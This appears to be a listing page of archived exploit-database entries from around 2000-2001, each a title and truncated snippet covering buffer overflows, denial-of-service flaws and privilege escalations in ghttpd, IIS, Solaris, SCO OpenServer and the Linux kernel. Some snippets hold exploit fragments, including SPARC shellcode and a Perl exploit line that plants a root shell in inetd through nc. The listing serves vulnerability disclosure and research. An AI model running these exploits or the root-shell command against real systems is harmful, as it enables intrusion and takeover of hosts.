Buffer Overflow in GazTek HTTP Daemon v1.4 (ghttpd)

/ qitest1's security advisory 002 / Buffer Overflow in GazTek HTTP Daemon v1.4 ghttpd +Systems Affected Any system running GazTek HTTP Daemon v1.4 ghttpd +Program Description ghttpd is a small and easy to configure HTTP server with CGI support, tested on Linux. It can run as a standalone daemon o...

TransSoft Broker FTP Server 3.04.04.75.x - CWD Buffer Overflow

TransSoft Broker FTP Server 3.04.04.75.x - CWD Buffer Overflow source: https://www.securityfocus.com/bid/2851/info Broker is a Windows FTP server from TransSoft. Versions of Broker are vulnerable to a denial of service. A CD or CWD command, argumented by an invalid '. .' dot-space-dot sequence ca...

Buffer Overflow in TIAtunnel-0.9alpha2

/ qitest1's security advisory 001 / Buffer Overflow in TIAtunnel-0.9alpha2 +Systems Affected Any system running TIAtunnel-0.9alpha2 +Program Description TIAtunnel is a simple IRC bouncer that allows access from a simple IPv4 box to any kind of well-known server. It has been written by tHE rECIdjV...

Microsoft Windows Server 2000 - Telnet Username Denial of Service

Microsoft Windows Server 2000 - Telnet Username Denial of Service source: https://www.securityfocus.com/bid/2838/info Due to a flaw in the implementation of the telnet service, it is possible for a remote client to perform a denial of service attack against a host. If approximately 4300 character...

Microsoft Windows Server 2000 SP1/SP2 - isapi .printer Extension Overflow (2)

/ IIS 5 remote .printer overflow. "jill.c" don't ask. by: dark spyrit respect to eeye for finding this one - nice work. shouts to halvar, neofight and the beavuh bitchez. this exploit overwrites an exception frame to control eip and get to our code.. the code then locates the pointer to our large...

NullSoft Winamp 2.x - AIP Buffer Overflow

NullSoft Winamp 2.x - AIP Buffer Overflow // source: https://www.securityfocus.com/bid/2680/info Winamp is a popular media player supporting MP3 and other filetypes. Versions of Winamp are vulnerable to a buffer overflow condition triggered during processing of Audiosoft parameter files .AIP. A...

Solaris 78 - kcms_configure Command-Line Buffer Overflow (1)

Solaris 78 - kcmsconfigure Command-Line Buffer Overflow 1 // source: https://www.securityfocus.com/bid/2558/info The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcmsconfigure, a part of KCMS, is vulnerable to a buffer overflow...

Linux Kernel 2.2.18 (RedHat 6.27.0 2.2.142.2.182.2.18ow4) - ptraceexecve Race Condition Privilege Escalation (1)

Linux Kernel 2.2.18 RedHat 6.27.0 2.2.142.2.182.2.18ow4 - ptraceexecve Race Condition Privilege Escalation 1 / EDB Note: Updated exploit can be found here: https://www.exploit-db.com/exploits/20721/ source: https://www.securityfocus.com/bid/2529/info The Linux kernel is the core of all...

Microsoft IIS 5.0 - WebDAV Denial of Service

Microsoft IIS 5.0 - WebDAV Denial of Service source: https://www.securityfocus.com/bid/2453/info Microsoft IIS is subject to a denial of service condition. WebDAV contains a flaw in the handling of certain malformed requests, submitting multiple malformed WebDAV requests could cause the server to...

Microsoft IIS 5.0 - WebDAV Denial of Service

source: https://www.securityfocus.com/bid/2453/info Microsoft IIS is subject to a denial of service condition. WebDAV contains a flaw in the handling of certain malformed requests, submitting multiple malformed WebDAV requests could cause the server to stop responding. This vulnerability is also...

Quick Analysiss of the recent crc32 ssh(d) bug

Abstract ----------- This article discusses the recently discovered security hole in the crc32 attack detector as found in common ssh packages like OpenSSH and derivates using the ssh-1 protocoll. There is a possible overflow during assignemnet from 32bit integer to 16bit wide one leading to...

Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Command Execution

!/usr/bin/perl Remote sploit for Netscape Enterprise Server 4.0/sparc/SunOS 5.7 usage: ns-shtml.pl 'command line' | nc victim port Sometimes server may hang or coredump.. eek ;- [email protected] $cmdline="echo 'ingreslock stream tcp nowait root /bin/sh sh -i' /tmp/bob; /usr/sbin/inetd -s...

SCO OpenServer 5.0.5 - Env Local Stack Overflow

/ Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM / / The copyright notice above does not evidence any / / actual or intended publication of such source code. / / / / Title: SCO OpenServer mscreen / / Tested under: SCO OpenServer 5.0.5 / / By: K...

SCO OpenServer 5.0.5 - Env Local Stack Overflow

SCO OpenServer 5.0.5 - Env Local Stack Overflow / Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM / / The copyright notice above does not evidence any / / actual or intended publication of such source code. / / / / Title: SCO OpenServer mscreen ...

SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit

Exploit for sco platform in category local exploits ===================================================== SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit ===================================================== / Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY...

Solaris 2.62.7 - usrbinwrite Local Overflow

Solaris 2.62.7 - usrbinwrite Local Overflow include include / /usr/bin/write overflow proof of conecpt. Tested on Solaris 7 x86 Pablo Sor, Buenos Aires, Argentina. 01/2000 [email protected] usage: write-exp shelloffset retaddroffset default offset should work. / long getesp asm"movl %esp,%eax"; ch...

Solaris /usr/bin/write Vulnerability

I have written an exploit for the /usr/bin/write command , this is not a new vulnerability but it has not been fixed at least till Solaris 7 patchs dont know about Solaris 8. This command contains a buffer overflow in the second argument. If this data exceeds predefined length, inserting two valu...

APC UPS 3.7.2 - apcupsd Local Denial of Service

APC UPS 3.7.2 - apcupsd Local Denial of Service / Local Denial of Service for any linux box running APCUPSD v3.7.2 APCUPSD has his pid file world writeable, therefore it is possible to let it kill another pid and create a denial of service against any running daemon. when the apcupsd is stopped,...

Solaris 78-beta - ARP Local Overflow

Solaris 78-beta - ARP Local Overflow / arp overflow proof of concept by [email protected] shellcode originally written by Cheez Whiz. tested on x86 solaris 7,8beta default should work. if not, arg1 = offset. +- by 100's Copyright Security-Focus.com, 11/2000 / long getesp asm"movl %esp,%eax"...

Solaris 2.5/2.5.1 - 'getgrnam()' Local Overflow

include include / getgrnam function overflow. works against Solaris 2.5/2.5.1 SPARC default offset should work. Pablo Sor, Buenos Aires, Argentina. [email protected] / uchar shell = "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"...